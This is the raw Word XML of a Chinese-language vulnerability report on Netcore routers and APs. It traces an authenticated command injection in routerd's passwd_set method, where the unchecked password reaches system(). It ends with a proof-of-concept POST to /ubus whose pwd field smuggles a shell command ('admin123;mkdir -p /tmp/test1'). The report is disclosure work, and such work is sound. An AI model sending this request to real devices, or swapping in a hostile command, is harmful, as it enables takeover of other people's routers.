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E8D9" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Netcore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>磊科路由器、无线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>产品存在授权后的任意命令注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393B5A9" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一、涉及产品及固件下载地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ACCC4B" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>NBR1005GPEV2</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.netcoretec.com/service-support/download/firmware/2707.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1426200E" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>B6V2</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.netcoretec.com/service-support/download/firmware/2703.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A88584" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>COVER5</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.netcoretec.com/service-support/download/firmware/2680.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D16D6EA" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>NAP930</w:t>
      </w:r>
      <w:r>
        <w:t>（存疑）：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.netcoretec.com/service-support/download/firmware/2704.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703FD786" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>NAP830</w:t>
      </w:r>
      <w:r>
        <w:t>（存疑）：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.netcoretec.com/service-support/download/firmware/2708.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3C2E15" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>NBR100V2</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.netcoretec.com/service-support/download/firmware/2706.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D76F1CF" w14:textId="096BE49C" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>NBR200V2</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.netcoretec.com/service-support/download/firmware/2705.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5727A00A" w14:textId="5BB79041" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因硬件模拟有限（使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>模拟和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>openwrt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>malta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>内核），无法对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NAP930</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NAP830</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行模拟验证，但其代码中确实存在该漏洞。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如需展示模拟步骤</w:t>
      </w:r>
      <w:r w:rsidR="00E82690">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和其他产品的攻击演示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，可告知我补充。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263373A1" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二、漏洞成因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE7B2B8" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>该系列路由器固件使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> uhttpd + ubus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>架构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BFFE68" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>uhttpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158FB327" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>监听</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 80 </w:t>
      </w:r>
      <w:r>
        <w:t>端口（</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>），接收</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST /ubus </w:t>
      </w:r>
      <w:r>
        <w:t>请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D88AB4" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>解析请求头，确认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Content-Type </w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r>
        <w:t>，但实际负载为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON</w:t>
      </w:r>
      <w:r>
        <w:t>（不规范但常见）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424DE352" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>将请求转发给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ubus RPC </w:t>
      </w:r>
      <w:r>
        <w:t>服务（通常通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ubus </w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unix Socket </w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CGI </w:t>
      </w:r>
      <w:r>
        <w:t>接口）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116A904" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:t>ubus list</w:t>
      </w:r>
      <w:r>
        <w:t>命令可以看到</w:t>
      </w:r>
      <w:r>
        <w:t>ubus</w:t>
      </w:r>
      <w:r>
        <w:t>注册的服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5ECB55" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476E3813" wp14:editId="6A6A0053">
            <wp:extent cx="5486400" cy="3950381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="image-pA5hKVRBFdyl_61cN5P1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pA5hKVRBFdyl_61cN5P1E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3D4A" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>定位到</w:t>
      </w:r>
      <w:r>
        <w:t>routerd</w:t>
      </w:r>
      <w:r>
        <w:t>，即</w:t>
      </w:r>
      <w:r>
        <w:t>/usr/bin/routerd</w:t>
      </w:r>
      <w:r>
        <w:t>文件，在</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>段找到该服务注册的一系列方法的回调函数，</w:t>
      </w:r>
      <w:r>
        <w:t>passwd_set</w:t>
      </w:r>
      <w:r>
        <w:t>方法对应回调函数</w:t>
      </w:r>
      <w:r>
        <w:t>sub_416260</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B2FAD" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F9B5EAB" wp14:editId="068BC341">
            <wp:extent cx="5486400" cy="3591592"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="image-rdkmS3FO8CGfjIgzdON1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rdkmS3FO8CGfjIgzdON1h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D9FD" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在回调函数</w:t>
      </w:r>
      <w:r>
        <w:t>sub_416260</w:t>
      </w:r>
      <w:r>
        <w:t>中，首先调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> blobmsg_parse </w:t>
      </w:r>
      <w:r>
        <w:t>解析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Blob </w:t>
      </w:r>
      <w:r>
        <w:t>格式数据（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OpenWrt </w:t>
      </w:r>
      <w:r>
        <w:t>的二进制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:t>格式）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF78617" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ACE5547" wp14:editId="18AA5545">
            <wp:extent cx="5486400" cy="3110183"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="image-rlwwnBAcqPrp2BtatCuS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rlwwnBAcqPrp2BtatCuSm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0F9F" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>还原解析式所用结构体，得到以下字段映射：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC43CED" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>v19 → user</w:t>
      </w:r>
      <w:r>
        <w:t>（用户名）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766214BB" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED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v20 → pwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（密码）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后面还有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>v16=v20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC23276" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3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v21 → by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（请求中未提供时值为空）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54169B54" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5995EEB0" wp14:editId="67F2BFBC">
            <wp:extent cx="5486400" cy="592793"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="image-TZcIALhIaa0WUoFi_f-4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TZcIALhIaa0WUoFi_f-4u.pn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C3C8" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> v19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中提取用户名（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>），跳过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Blobmsg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>头部。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D0701A" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>遍历用户名中的每个字符，检查是否满足以下条件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786961DF" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>字符是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII 0x5F</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>字母数字（</w:t>
      </w:r>
      <w:r>
        <w:t>isalnum</w:t>
      </w:r>
      <w:r>
        <w:t>函数）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDCA357" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>若发现非法字符，记录日志并返回错误（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ulog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14734036" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B27B6B" wp14:editId="683595D4">
            <wp:extent cx="5486400" cy="3344091"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="image-fyWhWqQk8iu3oGO_uM_F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-fyWhWqQk8iu3oGO_uM_FS.png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17FC" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> v16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中提取密码值（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>v17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>），跳过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Blobmsg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>头部。</w:t>
      </w:r>
      <w:r>
        <w:t>此处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>无任何合法性检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>，直接传递给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> passwd_set_api</w:t>
      </w:r>
      <w:r>
        <w:t>。即执行</w:t>
      </w:r>
      <w:r>
        <w:t>passwd_set_api(usrname,password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6BD325" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>此处接下去如果</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，并且用户名为</w:t>
      </w:r>
      <w:r>
        <w:t>"root"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>v15</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:t>字段的字符串）不为</w:t>
      </w:r>
      <w:r>
        <w:t>"ac"</w:t>
      </w:r>
      <w:r>
        <w:t>，则直接将</w:t>
      </w:r>
      <w:r>
        <w:t>v17</w:t>
      </w:r>
      <w:r>
        <w:t>写入到</w:t>
      </w:r>
      <w:r>
        <w:t>uci set auto_ac.auto_ac.passwd=%s;uci commit auto_ac</w:t>
      </w:r>
      <w:r>
        <w:t>中，然后执行</w:t>
      </w:r>
      <w:r>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>，此处存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>命令注入</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39901FEA" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AC1DDAC" wp14:editId="2A6212C3">
            <wp:extent cx="5486400" cy="2724397"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="image-m36xKiLcK9Ru3546zAyV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-m36xKiLcK9Ru3546zAyVK.png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1604" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>passwd_set_api</w:t>
      </w:r>
      <w:r>
        <w:t>中，也并没有对密码进行检测（</w:t>
      </w:r>
      <w:r>
        <w:t>a2</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECA98A1" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F767F4F" wp14:editId="4FFEC394">
            <wp:extent cx="5486400" cy="6577020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="image-w36IbTUN1kp74B0cT54y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-w36IbTUN1kp74B0cT54yh.png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3805" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如果密码（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）存在，相当于执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC8085C" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t xml:space="preserve">snprintf(v10, 0x80u, "passwd %s", a1);  // v10 = "passwd root" snprintf(v11, 0x80u, "%s\n", a2);       // v11 = "admin123\n" v4 = popen(v10, "w");                   // </w:t>
      </w:r>
      <w:r>
        <w:t>打开命令管道（写入模式）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F58485" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>然后写入密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E9A6A6" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t xml:space="preserve">v5 = strlen(v11); fwrite(v11, v5, 1u, v4);  // </w:t>
      </w:r>
      <w:r>
        <w:t>第一次写入密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v6 = strlen(v11); fwrite(v11, v6, 1, v4);   // </w:t>
      </w:r>
      <w:r>
        <w:t>第二次写入密码（确认密码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB2151" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成功后返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，即成功抵达上面命令注入的漏洞处。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632A19A8" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BA1E259" wp14:editId="0C756B85">
            <wp:extent cx="5486400" cy="4424675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="image-TqwuTGCbbcQDQ_3LBkXu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-TqwuTGCbbcQDQ_3LBkXuM.png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3E56" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>三、</w:t>
      </w:r>
      <w:r>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:t>解释</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F5032" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>POST /ubus HTTP/1.1 Host: 192.168.50.2 Content-Length: 163 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Origin: http://192.168.50.2 Referer: http://192.168.50.2/guide/guide.html Accept-Encoding: gzip, deflate, br Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0457AB" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>{"jsonrpc":"2.0","id":22,"method":"call","params":["a9c61fc83080b13ded7512db83c9b123","routerd","passwd_set",{"user":"root","pwd":"admin123;mkdir -p /tmp/test1"}]}</w:t>
